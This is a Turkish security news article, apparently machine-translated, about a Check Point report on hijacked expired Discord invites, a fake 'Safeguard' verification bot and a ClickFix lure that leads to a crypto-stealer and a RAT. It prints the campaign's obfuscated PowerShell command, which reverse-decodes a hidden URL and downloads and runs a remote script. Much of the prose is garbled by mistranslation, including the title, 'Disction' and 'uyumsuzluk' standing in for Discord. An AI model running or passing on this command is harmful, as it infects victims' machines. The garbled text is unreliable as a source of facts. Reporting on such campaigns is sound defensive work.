Tehdit Aktörleri Süresi Doldurulmuş Discord Displing Multi-Aşamalı Kötü Amaçlı Yazılımlar Vermek İçin Bağlantıları Davetler


Tehdit Aktörleri Süresi Doldurulmuş Discord Displing Multi-Aşamalı Kötü Amaçlı Yazılımlar Vermek İçin Bağlantıları Davetler

Siber suçlular, Discord’un davet sisteminde kritik bir kusurdan yararlanan ve süresi dolmuş davet bağlantılarını kaçırmalarına ve şüpheli olmayan kullanıcıları gelişmiş kötü amaçlı yazılım kampanyalarını barındıran kötü amaçlı sunuculara yönlendirmelerine izin veren sofistike yeni bir saldırı vektörü keşfettiler.

Bu ortaya çıkan tehdit, dünya çapında milyonlarca oyuncu ve topluluk tarafından kullanılan bir platform olan Discord’un güvenilir doğasını, aylar önce forumlarda, sosyal medyada veya resmi web sitelerinde paylaşılabilecek meşru davet bağlantıları aracılığıyla sessizce uzlaştırmak için kullanır.

Saldırı zinciri, tehdit aktörleri, yalnızca Premium Seviye 3 artırma aboneliklerine sahip sunucular için mevcut olan Discord’un Özel Vanity Invite Bağlantı Sistemini kullandığında başlar.

Google Haberleri

Meşru sunucular destek durumlarını kaybettiğinde veya geçici davet bağlantıları süresi dolduğunda, davet kodları, kendi geliştirilmiş sunucuları için özel makyaj URL’leri olarak kaydedebilen kötü amaçlı aktörler tarafından yeniden kullanılmak üzere kullanılabilir hale gelir.

Bu, daha önce güvenilen davet bağlantılarına tıklayan kullanıcıların, meşru görünmek için tasarlanmış saldırgan kontrollü uyumsuzluk sunucularına bilmeden yeniden yönlendirildiği tehlikeli bir senaryo oluşturur.

Check Point araştırmacıları, bu aktif kötü amaçlı yazılım kampanyasını Haziran 2025’te belirledi ve saldırganların sofistike kimlik avı planlarını ve çok aşamalı kötü amaçlı yazılım enfeksiyonlarını dağıtmak için bu anlaşmazlık kırılganlığını nasıl silahlandırdığını ortaya çıkardılar.

Enfeksiyon Zinciri – Kaçırılmış Disction’dan PowerShell Downloader’ın yürütülmesine davet edildi (Kaynak – Kontrol Noktası)

Araştırma ekibi, siber suçluların antivirüs araçları ve sanal alan güvenlik sistemleri tarafından tespitten kaçınmak için tasarlanmış çoklu enfeksiyon aşamalarını dikkatlice düzenlediği gerçek dünya saldırıları gözlemledi.

Kampanya, ClickFix kimlik avı tekniğini çok aşamalı yükleyiciler ve zamana dayalı kaçınmalar ile, özellikle kripto para cüzdanlarını hedefleyen özel bir Skuld stealer çeşidinin yanı sıra güçlü bir uzaktan erişim Truva’sının yanı sıra gizlice teslim etmek için dikkate değer bir teknik karmaşıklık gösteriyor.

Bu işlemi özellikle sinsi yapan şey, yük dağıtımının ve veri açığa çıkmasının sadece GitHub, Bitbucket, Pastebin ve Discord kendisi gibi güvenilir bulut hizmetleri yoluyla gerçekleşmesi ve kötü amaçlı trafiğin normal ağ aktivitesiyle sorunsuz bir şekilde karışmasına ve güvenlik alarmlarını yükseltmekten kaçınmasıdır.

Bu kampanyanın ölçeği ve etkisi önemlidir, barındırma platformlarından indirilen istatistikler, potansiyel kurbanların sayısının ABD, Vietnam, Fransa, Almanya ve Birleşik Krallık da dahil olmak üzere birçok ülkede 1.300’ü aştığını göstermektedir.

Saldırganların kripto para birimi ile ilgili kötü amaçlı yazılımlara odaklanması, öncelikle finansal kazanç ile motive edildiğini, kripto kullanıcılarını ve dijital varlıklarını hedeflediklerini göstermektedir.

ClickFix Sosyal Mühendislik Mekanizması

Bu kampanyada kullanılan enfeksiyon mekanizması, kurbanları gönüllü olarak kötü amaçlı kod yürütmeye yönlendirmek için ClickFix olarak bilinen rafine bir teknik kullanan sosyal mühendislikte bir masterclass’ı temsil eder.

Kullanıcılar kaçırılan Discord sunucusuna katıldıktan sonra, 1 Şubat 2025’te bu kampanya için özel olarak oluşturulan “Safeguard” adlı bir bot tarafından yönetilen meşru bir doğrulama süreci gibi görünen şeylerle karşılaşırlar.

Mağdurlar doğrulama düğmesini tıkladığında, Captchaguard’daki harici bir kimlik avı web sitesine yönlendirilirler[.]Discord’un kullanıcı arayüzünün sofistike bir kopyasını sunan ben.

Site, kullanıcıların manuel “doğrulama” adımları gerçekleştirmelerini isteyen yüklemede görünen sahte bir Google captcha görüntüler. Bu kötü niyetli sayfadaki JavaScript, bir PowerShell komutunu bilgisi olmadan kullanıcının panosuna sessizce kopyalar.

Enfeksiyon Zinciri – PowerShell’den Final Kötü Yazılım Yükü Teslimi’ne (Kaynak – Kontrol Noktası)

Kopyalı Powershell Komutanlığı, saldırganların teknik yeteneklerini gizleme teknikleri ile gösterir:-

powershell -NoExit -Command "$r="NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa";$u=($r[-1..-($r.Length)]-join '');$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));iex (iwr -Uri $url)"

Bu komut, yürüttüğünde, kötü amaçlı yazılım enfeksiyon zincirini başlatan bir PowerShell betiğini indiren bir pastebin URL’sini gizlemek için dize tersine çevirme ve Base64 kod çözme kullanır.

Sosyal mühendislik yönü özellikle etkilidir, çünkü kullanıcılara tanıdık Windows talimatları sunar – Win+R ile çalışma iletişim kutusunu açar, pano içeriğini yapıştırır ve birçok kullanıcının şüphe duymadan düzenli olarak gerçekleştirdiği eylemlere basın.

Bu yaklaşım, kullanıcıların dosyaları manuel olarak indirme veya çalıştırma ihtiyacını ortadan kaldırarak güvenlik bilincine sahip bireyleri tehdide karşı uyarabilecek ortak kırmızı bayrakları kaldırır.

Herhangi biriyle tehdit tepkisini otomatikleştirin. -> Tam erişim isteyin



Source link